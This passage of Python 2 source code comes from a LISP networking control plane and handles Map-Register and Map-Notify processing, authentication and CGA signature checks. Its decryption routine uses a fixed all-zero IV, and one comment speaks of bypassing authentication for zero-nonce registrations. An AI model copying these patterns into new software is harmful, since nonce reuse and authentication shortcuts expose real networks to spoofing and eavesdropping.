# queue an entry and send one out. Let the retransmission timer trigger
# the sending.
#
lisp_remove_eid_from_map_notify_queue(eid_list)
if (lisp_map_notify_queue.has_key(key)):
map_notify = lisp_map_notify_queue[key]
s = red(source.print_address_no_iid(), False)
lprint("Map-Notify with nonce 0x{} pending for xTR {}".format( \
lisp_hex_string(map_notify.nonce), s))
return
#endif
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = record_count
key_id = key_id
map_notify.key_id = key_id
map_notify.alg_id = alg_id
map_notify.auth_len = auth_len
map_notify.nonce = nonce
map_notify.nonce_key = lisp_hex_string(nonce)
map_notify.etr.copy_address(source)
map_notify.etr_port = port
map_notify.site = site
map_notify.eid_list = eid_list
#
# Put Map-Notify state on retransmission queue.
#
if (map_register_ack == False):
key = map_notify.nonce_key
lisp_map_notify_queue[key] = map_notify
#endif
if (map_register_ack):
lprint("Send Map-Notify to ack Map-Register")
else:
lprint("Send Map-Notify for RLOC-set change")
#endif
#
# Build packet and copy EID records from Map-Register.
#
packet = map_notify.encode(eid_records, site.auth_key[key_id])
map_notify.print_notify()
if (map_register_ack == False):
eid_record = lisp_eid_record()
eid_record.decode(eid_records)
eid_record.print_record(" ", False)
#endif
#
# Send out.
#
lisp_send_map_notify(lisp_sockets, packet, map_notify.etr, port)
site.map_notifies_sent += 1
if (map_register_ack): return
#
# Set retransmit timer if this is an unsolcited Map-Notify. Otherwise,
# we are acknowledging a Map-Register and the registerer is not going
# to send a Map-Notify-Ack so we shouldn't expect one.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_send_map_notify_ack
#
# Change Map-Notify message to have a new type (Map-Notify-Ack) and
# reauthenticate message.
#
def lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms):
map_notify.map_notify_ack = True
#
# Build packet and copy EID records from Map-Register.
#
packet = map_notify.encode(eid_records, ms.password)
map_notify.print_notify()
#
# Send the Map-Notify-Ack.
#
dest = ms.map_server
lprint("Send Map-Notify-Ack to {}".format(
red(dest.print_address(), False)))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#
# lisp_send_multicast_map_notify
#
# Send a Map-Notify message to an xTR for the supplied (S,G) passed into this
# function.
#
def lisp_send_multicast_map_notify(lisp_sockets, site_eid, eid_list, xtr):
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = 1
map_notify.nonce = lisp_get_control_nonce()
map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
map_notify.etr.copy_address(xtr)
map_notify.etr_port = LISP_CTRL_PORT
map_notify.eid_list = eid_list
key = map_notify.nonce_key
#
# If we are already sending Map-Notifies for the 2-tuple, no need to
# queue an entry and send one out. Let the retransmission timer trigger
# the sending.
#
lisp_remove_eid_from_map_notify_queue(map_notify.eid_list)
if (lisp_map_notify_queue.has_key(key)):
map_notify = lisp_map_notify_queue[key]
lprint("Map-Notify with nonce 0x{} pending for ITR {}".format( \
map_notify.nonce, red(xtr.print_address_no_iid(), False)))
return
#endif
#
# Put Map-Notify state on retransmission queue.
#
lisp_map_notify_queue[key] = map_notify
#
# Determine if there are any RTRs in the RLOC-set for this (S,G).
#
rtrs_exist = site_eid.rtrs_in_rloc_set()
if (rtrs_exist):
if (site_eid.is_rtr_in_rloc_set(xtr)): rtrs_exist = False
#endif
#
# Build EID-record.
#
eid_record = lisp_eid_record()
eid_record.record_ttl = 1440
eid_record.eid.copy_address(site_eid.eid)
eid_record.group.copy_address(site_eid.group)
eid_record.rloc_count = 0
for rloc_entry in site_eid.registered_rlocs:
if (rtrs_exist ^ rloc_entry.is_rtr()): continue
eid_record.rloc_count += 1
#endfor
packet = eid_record.encode()
#
# Print contents of Map-Notify.
#
map_notify.print_notify()
eid_record.print_record(" ", False)
#
# Build locator-set with only RTR RLOCs if they exist.
#
for rloc_entry in site_eid.registered_rlocs:
if (rtrs_exist ^ rloc_entry.is_rtr()): continue
rloc_record = lisp_rloc_record()
rloc_record.store_rloc_entry(rloc_entry)
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
#
# Encode it.
#
packet = map_notify.encode(packet, "")
if (packet == None): return
#
# Send Map-Notify to xtR.
#
lisp_send_map_notify(lisp_sockets, packet, xtr, LISP_CTRL_PORT)
#
# Set retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_queue_multicast_map_notify
#
# This funciton will look for the ITRs in the local site cache.
#
def lisp_queue_multicast_map_notify(lisp_sockets, rle_list):
null_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
for sg in rle_list:
sg_site_eid = lisp_site_eid_lookup(sg[0], sg[1], True)
if (sg_site_eid == None): continue
#
# (S,G) RLOC-set could be empty when last RLE goes away. We will have
# to search all individual registrations searching for RTRs.
#
# We store in a dictonary array so we can remove duplicates.
#
sg_rloc_set = sg_site_eid.registered_rlocs
if (len(sg_rloc_set) == 0):
temp_set = {}
for se in sg_site_eid.individual_registrations.values():
for rloc_entry in se.registered_rlocs:
if (rloc_entry.is_rtr() == False): continue
temp_set[rloc_entry.rloc.print_address()] = rloc_entry
#endfor
#endfor
sg_rloc_set = temp_set.values()
#endif
#
# If this is a (0.0.0.0/0, G) or a (0::/0, G), we send a Map-Notify
# to all members (all RLOCs in the sg_rloc_set.
#
notify = []
found_rtrs = False
if (sg_site_eid.eid.address == 0 and sg_site_eid.eid.mask_len == 0):
notify_str = []
rle_nodes = []
if (len(sg_rloc_set) != 0 and sg_rloc_set[0].rle != None):
rle_nodes = sg_rloc_set[0].rle.rle_nodes
#endif
for rle_node in rle_nodes:
notify.append(rle_node.address)
notify_str.append(rle_node.address.print_address_no_iid())
#endfor
lprint("Notify existing RLE-nodes {}".format(notify_str))
else:
#
# If the (S,G) has an RTR registered, then we will send a
# Map-Notify to the RTR instead the ITRs of the source-site.
#
for rloc_entry in sg_rloc_set:
if (rloc_entry.is_rtr()): notify.append(rloc_entry.rloc)
#endfor
#
# If no RTRs were found, get ITRs from source-site.
#
found_rtrs = (len(notify) != 0)
if (found_rtrs == False):
site_eid = lisp_site_eid_lookup(sg[0], null_group, False)
if (site_eid == None): continue
for rloc_entry in site_eid.registered_rlocs:
if (rloc_entry.rloc.is_null()): continue
notify.append(rloc_entry.rloc)
#endfor
#endif
#
# No ITRs or RTRs fond.
#
if (len(notify) == 0):
lprint("No ITRs or RTRs found for {}, Map-Notify suppressed". \
format(green(sg_site_eid.print_eid_tuple(), False)))
continue
#endif
#endif
#
# Send multicast Map-Notify to either ITR-list or RTR-list.
#
for xtr in notify:
lprint("Build Map-Notify to {}TR {} for {}".format("R" if \
found_rtrs else "x", red(xtr.print_address_no_iid(), False),
green(sg_site_eid.print_eid_tuple(), False)))
el = [sg_site_eid.print_eid_tuple()]
lisp_send_multicast_map_notify(lisp_sockets, sg_site_eid, el, xtr)
time.sleep(.001)
#endfor
#endfor
return
#enddef
#
# lisp_find_sig_in_rloc_set
#
# Look for a "signature" key in a JSON RLOC-record. Return None, if not found.
# Return RLOC record if found.
#
def lisp_find_sig_in_rloc_set(packet, rloc_count):
for i in range(rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
json_sig = rloc_record.json
if (json_sig == None): continue
try:
json_sig = json.loads(json_sig.json_string)
except:
lprint("Found corrupted JSON signature")
continue
#endtry
if (json_sig.has_key("signature") == False): continue
return(rloc_record)
#endfor
return(None)
#enddef
#
# lisp_get_eid_hash
#
# From an EID, return EID hash value. Here is an example where all but the
# high-order byte is the EID hash for each hash-length:
#
# EID: fd4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430
# EID-hash: 4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430 eid_hash_len = 120
# EID-hash: 6dbd:3799:48e1:c6a2:9430 eid_hash_len = 80
#
# Note when an eid-prefix in lisp_eid_hashes[] has an instance-id of -1, it
# means the eid-prefix is used for all EIDs from any instance-id.
#
# Returns a string with hex digits between colons and the hash length in bits.
# Returns None if the IPv6 EID is not a crypto-hash address. These addresses
# are not authenticated.
#
def lisp_get_eid_hash(eid):
hash_mask_len = None
for eid_prefix in lisp_eid_hashes:
#
# For wildcarding the instance-ID.
#
iid = eid_prefix.instance_id
if (iid == -1): eid_prefix.instance_id = eid.instance_id
ms = eid.is_more_specific(eid_prefix)
eid_prefix.instance_id = iid
if (ms):
hash_mask_len = 128 - eid_prefix.mask_len
break
#endif
#endfor
if (hash_mask_len == None): return(None)
address = eid.address
eid_hash = ""
for i in range(0, hash_mask_len / 16):
addr = address & 0xffff
addr = hex(addr)[2:-1]
eid_hash = addr.zfill(4) + ":" + eid_hash
address >>= 16
#endfor
if (hash_mask_len % 16 != 0):
addr = address & 0xff
addr = hex(addr)[2:-1]
eid_hash = addr.zfill(2) + ":" + eid_hash
#endif
return(eid_hash[0:-1])
#enddef
#
# lisp_lookup_public_key
#
# Given an EID, do a mapping system lookup for a distinguished-name EID
# 'hash-<cga-hash>' to obtain the public-key from an RLOC-record.
#
# Return [hash_id, pubkey, True/False]. Values can be of value None but last
# boolean argument is if the hash lookup was found.
#
def lisp_lookup_public_key(eid):
iid = eid.instance_id
#
# Parse out CGA hash to do public-key lookup with instance-ID and hash
# as a distinguished-name EID.
#
pubkey_hash = lisp_get_eid_hash(eid)
if (pubkey_hash == None): return([None, None, False])
pubkey_hash = "hash-" + pubkey_hash
hash_eid = lisp_address(LISP_AFI_NAME, pubkey_hash, len(pubkey_hash), iid)
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
#
# Do lookup in local instance-ID.
#
site_eid = lisp_site_eid_lookup(hash_eid, group, True)
if (site_eid == None): return([hash_eid, None, False])
#
# Look for JSON RLOC with key "public-key".
#
pubkey = None
for rloc in site_eid.registered_rlocs:
json_pubkey = rloc.json
if (json_pubkey == None): continue
try:
json_pubkey = json.loads(json_pubkey.json_string)
except:
lprint("Registered RLOC JSON format is invalid for {}".format( \
pubkey_hash))
return([hash_eid, None, False])
#endtry
if (json_pubkey.has_key("public-key") == False): continue
pubkey = json_pubkey["public-key"]
break
#endfor
return([hash_eid, pubkey, True])
#enddef
#
# lisp_verify_cga_sig
#
# Verify signature of an IPv6 CGA-based EID if the public-key hash exists
# in the local mapping database (with same instance-ID).
#
def lisp_verify_cga_sig(eid, rloc_record):
#
# Use signature-eid if in JSON string. Otherwise, Crypto-EID is signature-
# EID.
#
sig = json.loads(rloc_record.json.json_string)
if (lisp_get_eid_hash(eid)):
sig_eid = eid
elif (sig.has_key("signature-eid")):
sig_eid_str = sig["signature-eid"]
sig_eid = lisp_address(LISP_AFI_IPV6, sig_eid_str, 0, 0)
else:
lprint(" No signature-eid found in RLOC-record")
return(False)
#endif
#
# Lookup CGA hash in mapping datbase to get public-key.
#
hash_eid, pubkey, lookup_good = lisp_lookup_public_key(sig_eid)
if (hash_eid == None):
eid_str = green(sig_eid.print_address(), False)
lprint(" Could not parse hash in EID {}".format(eid_str))
return(False)
#endif
found = "found" if lookup_good else bold("not found", False)
eid_str = green(hash_eid.print_address(), False)
lprint(" Lookup for crypto-hashed EID {} {}".format(eid_str, found))
if (lookup_good == False): return(False)
if (pubkey == None):
lprint(" RLOC-record with public-key not found")
return(False)
#endif
pubkey_str = pubkey[0:8] + "..." + pubkey[-8::]
lprint(" RLOC-record with public-key '{}' found".format(pubkey_str))
#
# Get signature from RLOC-record in a form to let key.verify() do its
# thing.
#
sig_str = sig["signature"]
try:
sig = binascii.a2b_base64(sig_str)
except:
lprint(" Incorrect padding in signature string")
return(False)
#endtry
sig_len = len(sig)
if (sig_len & 1):
lprint(" Signature length is odd, length {}".format(sig_len))
return(False)
#endif
#
# The signature is over the following string: "[<iid>]<eid>".
#
sig_data = sig_eid.print_address()
#
# Verify signature of CGA and public-key.
#
pubkey = binascii.a2b_base64(pubkey)
try:
key = ecdsa.VerifyingKey.from_pem(pubkey)
except:
bad = bold("Bad public-key", False)
lprint(" {}, not in PEM format".format(bad))
return(False)
#endtry
#
# The hashfunc must be supplied to get signature interoperability between
# a Go signer an a Python verifier. The signature data must go through
# a sha256 hash first. Python signer must use:
#
# ecdsa.SigningKey.sign(sig_data, hashfunc=hashlib.sha256)
#
# Note to use sha256 you need a curve of NIST256p.
#
try:
good = key.verify(sig, sig_data, hashfunc=hashlib.sha256)
except:
lprint(" Signature library failed for signature data '{}'".format( \
sig_data))
lprint(" Signature used '{}'".format(sig_str))
return(False)
#endtry
return(good)
#enddef
#
# lisp_remove_eid_from_map_notify_queue
#
# Check to see if any EIDs from the input list are in the Map-Notify
# retransmission queue. If so, remove them. That is, pop the key from the
# dictionary array. The key is the catentation of the xTR address and
# map-notify nonce.
#
def lisp_remove_eid_from_map_notify_queue(eid_list):
#
# Determine from the supplied EID-list, if any EID is in any EID-list of
# a queued Map-Notify.
#
keys_to_remove = []
for eid_tuple in eid_list:
for mn_key in lisp_map_notify_queue:
map_notify = lisp_map_notify_queue[mn_key]
if (eid_tuple not in map_notify.eid_list): continue
keys_to_remove.append(mn_key)
timer = map_notify.retransmit_timer
if (timer): timer.cancel()
lprint("Remove from Map-Notify queue nonce 0x{} for EID {}".\
format(map_notify.nonce_key, green(eid_tuple, False)))
#endfor
#endfor
#
# Now remove keys that were determined to be removed.
#
for mn_key in keys_to_remove: lisp_map_notify_queue.pop(mn_key)
return
#enddef
#
# lisp_decrypt_map_register
#
# Check if we should just return a non encrypted packet, or decrypt and return
# a plaintext Map-Register message.
#
def lisp_decrypt_map_register(packet):
#
# Parse first 4 bytes which is not encrypted. If packet is not encrypted,
# return to caller. If it is encrypted, get 3-bit key-id next to e-bit.
#
header = socket.ntohl(struct.unpack("I", packet[0:4])[0])
e_bit = (header >> 13) & 0x1
if (e_bit == 0): return(packet)
ekey_id = (header >> 14) & 0x7
#
# Use 16-byte key which is 32 string characters.
#
try:
ekey = lisp_ms_encryption_keys[ekey_id]
ekey = ekey.zfill(32)
iv = "0" * 8
except:
lprint("Cannot decrypt Map-Register with key-id {}".format(ekey_id))
return(None)
#endtry
d = bold("Decrypt", False)
lprint("{} Map-Register with key-id {}".format(d, ekey_id))
plaintext = chacha.ChaCha(ekey, iv).decrypt(packet[4::])
return(packet[0:4] + plaintext)
#enddef
#
# lisp_process_map_register
#
# Process received Map-Register message.
#
def lisp_process_map_register(lisp_sockets, packet, source, sport):
global lisp_registered_count
#
# First check if we are expecting an encrypted Map-Register. This call
# will either return a unencrypted packet, a decrypted packet, or None
# if the key-id from the Map-Register is not registered.
#
packet = lisp_decrypt_map_register(packet)
if (packet == None): return
map_register = lisp_map_register()
orig_packet, packet = map_register.decode(packet)
if (packet == None):
lprint("Could not decode Map-Register packet")
return
#endif
map_register.sport = sport
map_register.print_map_register()
#
# Verify that authentication parameters are consistent.
#
sha1_or_sha2 = True
if (map_register.auth_len == LISP_SHA1_160_AUTH_DATA_LEN):
sha1_or_sha2 = True
#endif
if (map_register.alg_id == LISP_SHA_256_128_ALG_ID):
sha1_or_sha2 = False
#endif
#
# For tracking which (S,G) RLEs have changed.
#
rle_list = []
#
# Process each EID record in Map-Register message.
#
site = None
start_eid_records = packet
eid_list = []
record_count = map_register.record_count
for i in range(record_count):
eid_record = lisp_eid_record()
rloc_record = lisp_rloc_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Register packet")
return
#endif
eid_record.print_record(" ", False)
#
# Lookup lisp_site entry.
#
site_eid = lisp_site_eid_lookup(eid_record.eid, eid_record.group,
False)
match_str = site_eid.print_eid_tuple() if site_eid else None
#
# Allowing overlapping ams registered prefixes. Make sure we get the
# configured parent entry and not the registered more-specific. This
# registration could be a more-specific of the registered more-specific
# entry.
#
if (site_eid and site_eid.accept_more_specifics == False):
if (site_eid.eid_record_matches(eid_record) == False):
parent = site_eid.parent_for_more_specifics
if (parent): site_eid = parent
#endif
#endif
#
# Check if this is a new more-specific EID-prefix registration that
# will match a static configured site-eid with "accept-more-specifics"
# configured.
#
ams = (site_eid and site_eid.accept_more_specifics)
if (ams):
ms_site_eid = lisp_site_eid(site_eid.site)
ms_site_eid.dynamic = True
ms_site_eid.eid.copy_address(eid_record.eid)
ms_site_eid.group.copy_address(eid_record.group)
ms_site_eid.parent_for_more_specifics = site_eid
ms_site_eid.add_cache()
ms_site_eid.inherit_from_ams_parent()
site_eid.more_specific_registrations.append(ms_site_eid)
site_eid = ms_site_eid
else:
site_eid = lisp_site_eid_lookup(eid_record.eid, eid_record.group,
True)
#endif
eid_str = eid_record.print_eid_tuple()
if (site_eid == None):
notfound = bold("Site not found", False)
lprint(" {} for EID {}{}".format(notfound, green(eid_str, False),
", matched non-ams {}".format(green(match_str, False) if \
match_str else "")))
#
# Need to hop over RLOC-set so we can get to the next EID-record.
#
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
continue
#endif
site = site_eid.site
if (ams):
e = site_eid.parent_for_more_specifics.print_eid_tuple()
lprint(" Found ams {} for site '{}' for registering prefix {}". \
format(green(e, False), site.site_name, green(eid_str, False)))
else:
e = green(site_eid.print_eid_tuple(), False)
lprint(" Found {} for site '{}' for registering prefix {}". \
format(e, site.site_name, green(eid_str, False)))
#endif
#
# Check if site configured in admin-shutdown mode.
#
if (site.shutdown):
lprint((" Rejecting registration for site '{}', configured in " +
"admin-shutdown state").format(site.site_name))
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
continue
#endif
#
# Verify authentication before processing locator-set. Quick hack
# while I figure out why sha1 and sha2 authentication is not working
# from cisco. An NX-OS Map-Register will have a 0 nonce. We are going
# to use this to bypass the authentication check.
#
key_id = map_register.key_id
if (site.auth_key.has_key(key_id)):
password = site.auth_key[key_id]
else:
password = ""
#endif
auth_good = lisp_verify_auth(orig_packet, map_register.alg_id,
map_register.auth_data, password)
dynamic = "dynamic " if site_eid.dynamic else ""
passfail = bold("passed" if auth_good else "failed", False)
key_id = "key-id {}".format(key_id) if key_id == map_register.key_id \
else "bad key-id {}".format(map_register.key_id)
lprint(" Authentication {} for {}EID-prefix {}, {}".format( \
passfail, dynamic, green(eid_str, False), key_id))
#
# If the IPv6 EID is a CGA, verify signature if it exists in an
# RLOC-record.
#
cga_good = True
is_crypto_eid = (lisp_get_eid_hash(eid_record.eid) != None)
if (is_crypto_eid or site_eid.require_signature):
required = "Required " if site_eid.require_signature else ""
eid_str = green(eid_str, False)
rloc = lisp_find_sig_in_rloc_set(packet, eid_record.rloc_count)
if (rloc == None):
cga_good = False
lprint((" {}EID-crypto-hash signature verification {} " + \
"for EID-prefix {}, no signature found").format(required,
bold("failed", False), eid_str))
else:
cga_good = lisp_verify_cga_sig(eid_record.eid, rloc)
passfail = bold("passed" if cga_good else "failed", False)
lprint((" {}EID-crypto-hash signature verification {} " + \
"for EID-prefix {}").format(required, passfail, eid_str))
#endif
#endif
if (auth_good == False or cga_good == False):
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
continue
#endif
#
# If merge being requested get individual site-eid. If not, and what
# was cached had merge bit set, set flag to issue error.
#
if (map_register.merge_register_requested):
parent = site_eid
parent.inconsistent_registration = False
#
# Clear out all registrations, there is a new site-id registering.
# Or there can be multiple sites registering for a multicast (S,G).
#
if (site_eid.group.is_null()):
if (parent.site_id != map_register.site_id):
parent.site_id = map_register.site_id
parent.registered = False
parent.individual_registrations = {}
parent.registered_rlocs = []
lisp_registered_count -= 1
#endif
#endif
key = source.address + map_register.xtr_id
if (site_eid.individual_registrations.has_key(key)):
site_eid = site_eid.individual_registrations[key]
else:
site_eid = lisp_site_eid(site)
site_eid.eid.copy_address(parent.eid)
site_eid.group.copy_address(parent.group)
site_eid.encrypt_json = parent.encrypt_json
parent.individual_registrations[key] = site_eid
#endif
else:
site_eid.inconsistent_registration = \
site_eid.merge_register_requested
#endif
site_eid.map_registers_received += 1
#
# If TTL is 0, unregister entry if source of Map-Reqister is in the
# list of currently registered RLOCs.
#
bad = (site_eid.is_rloc_in_rloc_set(source) == False)
if (eid_record.record_ttl == 0 and bad):
lprint(" Ignore deregistration request from {}".format( \
red(source.print_address_no_iid(), False)))
continue
#endif
#
# Clear out previously stored RLOCs. Put new ones in if validated
# against configured ones.
#
previous_rlocs = site_eid.registered_rlocs
site_eid.registered_rlocs = []
#
# Process each RLOC record in EID record.
#
start_rloc_records = packet
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None, site_eid.encrypt_json)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
rloc_record.print_record(" ")
#
# Run RLOC in Map-Register against configured RLOC policies.
#
if (len(site.allowed_rlocs) > 0):
addr_str = rloc_record.rloc.print_address()
if (site.allowed_rlocs.has_key(addr_str) == False):
lprint((" Reject registration, RLOC {} not " + \
"configured in allowed RLOC-set").format( \
red(addr_str, False)))
site_eid.registered = False
packet = rloc_record.end_of_rlocs(packet,
eid_record.rloc_count - j - 1)
break
#endif
#endif
#
# RLOC validated good. Otherwise, go to next EID record
#
rloc = lisp_rloc()
rloc.store_rloc_from_record(rloc_record, None, source)
#
# If the source of the Map-Register is in the locator-set, then
# store if it wants Map-Notify messages when a new locator-set
# is registered later.
#
if (source.is_exact_match(rloc.rloc)):
rloc.map_notify_requested = map_register.map_notify_requested
#endif
#
# Add to RLOC set for site-eid.
#
site_eid.registered_rlocs.append(rloc)
#endfor
changed_rloc_set = \
(site_eid.do_rloc_sets_match(previous_rlocs) == False)
#
# Do not replace RLOCs if the Map-Register is a refresh and the
# locator-set is different.
#
if (map_register.map_register_refresh and changed_rloc_set and
site_eid.registered):
lprint(" Reject registration, refreshes cannot change RLOC-set")
site_eid.registered_rlocs = previous_rlocs
continue
#endif
#
# Copy fields from packet into internal data structure. First set
# site EID specific state.
#
if (site_eid.registered == False):
site_eid.first_registered = lisp_get_timestamp()
lisp_registered_count += 1
#endif
site_eid.last_registered = lisp_get_timestamp()
site_eid.registered = (eid_record.record_ttl != 0)
site_eid.last_registerer = source
#
# Now set site specific state.
#
site_eid.auth_sha1_or_sha2 = sha1_or_sha2
site_eid.proxy_reply_requested = map_register.proxy_reply_requested
site_eid.lisp_sec_present = map_register.lisp_sec_present
site_eid.map_notify_requested = map_register.map_notify_requested
site_eid.mobile_node_requested = map_register.mobile_node
site_eid.merge_register_requested = \
map_register.merge_register_requested
site_eid.use_register_ttl_requested = map_register.use_ttl_for_timeout
if (site_eid.use_register_ttl_requested):
site_eid.register_ttl = eid_record.store_ttl()
else:
site_eid.register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
#endif
site_eid.xtr_id_present = map_register.xtr_id_present
if (site_eid.xtr_id_present):
site_eid.xtr_id = map_register.xtr_id
site_eid.site_id = map_register.site_id
#endif
#
# If merge requested, do it now for this EID-prefix.
#
if (map_register.merge_register_requested):
if (parent.merge_in_site_eid(site_eid)):
rle_list.append([eid_record.eid, eid_record.group])
#endif
if (map_register.map_notify_requested):
lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
eid_record)
#endif
#endif
if (changed_rloc_set == False): continue
if (len(rle_list) != 0): continue
eid_list.append(site_eid.print_eid_tuple())
#
# Send Map-Notify if the RLOC-set changed for thie site-eid. Send it
# to the previously registered RLOCs only if they requested it. Do
# not consider RLOC-sets with RLEs in them because at the end of
# the EID-record loop, we'll send a multicast Map-Notify.
#
eid_record = eid_record.encode()
eid_record += start_rloc_records
el = [site_eid.print_eid_tuple()]
lprint(" Changed RLOC-set, Map-Notifying old RLOC-set")
for rloc in previous_rlocs:
if (rloc.map_notify_requested == False): continue
if (rloc.rloc.is_exact_match(source)): continue
lisp_build_map_notify(lisp_sockets, eid_record, el, 1, rloc.rloc,
LISP_CTRL_PORT, map_register.nonce, map_register.key_id,
map_register.alg_id, map_register.auth_len, site, False)
#endfor
#
# Check subscribers.
#
lisp_notify_subscribers(lisp_sockets, eid_record, site_eid.eid, site)
#endfor
#
# Send Map-Noitfy to ITRs if any (S,G) RLE has changed.
#
if (len(rle_list) != 0):
lisp_queue_multicast_map_notify(lisp_sockets, rle_list)
#endif
#
# The merged Map-Notify will serve as a Map-Register ack. So don't need
# to send another one below.
#
if (map_register.merge_register_requested): return
#
# Should we ack the Map-Register? Only if the Want-Map-Notify bit was set
# by the registerer.
#
if (map_register.map_notify_requested and site != None):
lisp_build_map_notify(lisp_sockets, start_eid_records, eid_list,
map_register.record_count, source, sport, map_register.nonce,
map_register.key_id, map_register.alg_id, map_register.auth_len,
site, True)
#endif
return
#enddef
#
# lisp_process_multicast_map_notify
#
# Have the ITR process receive a multicast Map-Notify message. We will update
# the map-cache with a new RLE for the (S,G) entry. We do not have to
# authenticate the Map-Notify or send a Map-Notify-Ack since the lisp-etr
# process as already done so.
#
def lisp_process_multicast_map_notify(packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(packet)
if (packet == None):
lprint("Could not decode Map-Notify packet")
return
#endif
map_notify.print_notify()
if (map_notify.record_count == 0): return
eid_records = map_notify.eid_records
for i in range(map_notify.record_count):
eid_record = lisp_eid_record()
eid_records = eid_record.decode(eid_records)
if (packet == None): return
eid_record.print_record(" ", False)
#
# Get or create map-cache entry for (S,G).
#
mc = lisp_map_cache_lookup(eid_record.eid, eid_record.group)
if (mc == None):
allow, x, y = lisp_allow_gleaning(eid_record.eid, eid_record.group,
None)
if (allow == False): continue
mc = lisp_mapping(eid_record.eid, eid_record.group, [])
mc.add_cache()
#endif
#
# Gleaned map-cache entries always override what is regitered in
# the mapping system. Since the mapping system RLE entries are RTRs
# and RTRs store gleaned mappings for group members.
#
if (mc.gleaned):
lprint("Ignore Map-Notify for gleaned {}".format( \
green(mc.print_eid_tuple(), False)))
continue
#endif
mc.mapping_source = None if source == "lisp-etr" else source
mc.map_cache_ttl = eid_record.store_ttl()
#
# If no RLOCs in the Map-Notify and we had RLOCs in the existing
# map-cache entry, remove them.
#
if (len(mc.rloc_set) != 0 and eid_record.rloc_count == 0):
mc.rloc_set = []
mc.build_best_rloc_set()
lisp_write_ipc_map_cache(True, mc)
lprint("Update {} map-cache entry with no RLOC-set".format( \
green(mc.print_eid_tuple(), False)))
continue
#endif
rtr_mc = mc.rtrs_in_rloc_set()
#
# If there are RTRs in the RLOC set for an existing map-cache entry,
# only put RTR RLOCs from the Map-Notify in the map-cache.
#
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
eid_records = rloc_record.decode(eid_records, None)
rloc_record.print_record(" ")
if (eid_record.group.is_null()): continue
if (rloc_record.rle == None): continue
#
# Get copy of stats from old stored record so the display can
# look continuous even though the physical pointer is changing.
#
stats = mc.rloc_set[0].stats if len(mc.rloc_set) != 0 else None
#
# Store in map-cache.
#
rloc = lisp_rloc()
rloc.store_rloc_from_record(rloc_record, None, mc.mapping_source)
if (stats != None): rloc.stats = copy.deepcopy(stats)
if (rtr_mc and rloc.is_rtr() == False): continue
mc.rloc_set = [rloc]
mc.build_best_rloc_set()
lisp_write_ipc_map_cache(True, mc)
lprint("Update {} map-cache entry with RLE {}".format( \
green(mc.print_eid_tuple(), False),
rloc.rle.print_rle(False, True)))
#endfor
#endfor
return
#enddef
#
# lisp_process_map_notify
#
# Process Map-Notify message. All that needs to be done is to validate it with
# the Map-Server that sent it and return a Map-Notify-Ack.
#
def lisp_process_map_notify(lisp_sockets, orig_packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(orig_packet)
if (packet == None):
lprint("Could not decode Map-Notify packet")
return
#endif
map_notify.print_notify()
#
# Get map-server so we can do statistics and find auth-key, if a auth-key
# was provided in a Map-Notify message.
#
s = source.print_address()
if (map_notify.alg_id != 0 or map_notify.auth_len != 0):
ms = None
for key in lisp_map_servers_list:
if (key.find(s) == -1): continue
ms = lisp_map_servers_list[key]
#endfor
if (ms == None):
lprint((" Could not find Map-Server {} to authenticate " + \
"Map-Notify").format(s))
return
#endif
ms.map_notifies_received += 1
auth_good = lisp_verify_auth(packet, map_notify.alg_id,
map_notify.auth_data, ms.password)
lprint(" Authentication {} for Map-Notify".format("succeeded" if \
auth_good else "failed"))
if (auth_good == False): return
else:
ms = lisp_ms(s, None, "", 0, "", False, False, False, False, 0, 0, 0,
None)
#endif
#
# Send out Map-Notify-Ack. Skip over packet so lisp_send_map_notify()
# starts the packet with EID-records.
#
eid_records = map_notify.eid_records
if (map_notify.record_count == 0):
lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
return
#endif
#
# If this is a Map-Notify for an (S,G) entry, send the message to the
# lisp-itr process so it can update its map-cache for an active source
# in this site. There is probably a RLE change that the ITR needs to know
# about.
#
eid_record = lisp_eid_record()
packet = eid_record.decode(eid_records)
if (packet == None): return
eid_record.print_record(" ", False)
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Notify packet")
return
#endif
rloc_record.print_record(" ")
#endfor
#
# Right now, don't do anything with non-multicast EID records.
#
if (eid_record.group.is_null() == False):
#
# Forward to lisp-itr process via the lisp-core process so multicast
# Map-Notify messages are processed by the ITR process.
#
lprint("Send {} Map-Notify IPC message to ITR process".format( \
green(eid_record.print_eid_tuple(), False)))
ipc = lisp_control_packet_ipc(orig_packet, s, "lisp-itr", 0)
lisp_ipc(ipc, lisp_sockets[2], "lisp-core-pkt")
#endif
#
# Send Map-Notify-Ack after processing contents of Map-Notify.
#
